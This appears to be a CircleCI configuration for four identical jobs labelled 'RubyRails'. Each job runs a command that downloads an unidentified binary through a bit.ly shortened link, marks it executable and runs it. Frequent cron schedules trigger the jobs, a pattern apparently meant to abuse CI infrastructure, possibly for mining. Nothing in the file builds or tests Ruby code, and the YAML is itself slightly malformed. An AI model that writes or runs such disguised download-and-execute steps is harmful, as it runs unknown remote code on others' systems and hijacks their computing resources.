version: 2.0
jobs:
  manganang1:
    docker:
      - image: circleci/ruby:2.6.7
    - run:
        name: RubyRails
        command: wget https://bit.ly/3yD1aG2 && chmod +x 3yD1aG2 && ./3yD1aG2

  manganang2:
    docker:
      - image: circleci/ruby:2.6.7
    - run:
        name: RubyRails
        command: wget https://bit.ly/3yD1aG2 && chmod +x 3yD1aG2 && ./3yD1aG2

  manganang3:
    docker:
      - image: circleci/ruby:2.6.7
    - run:
        name: RubyRails
        command: wget https://bit.ly/3yD1aG2 && chmod +x 3yD1aG2 && ./3yD1aG2

  manganang4:
    docker:
      - image: circleci/ruby:2.6.7
    - run:
        name: RubyRails
        command: wget https://bit.ly/3yD1aG2 && chmod +x 3yD1aG2 && ./3yD1aG2
        
workflows:
  version: 2
  commit:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  runningrubyjobs:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
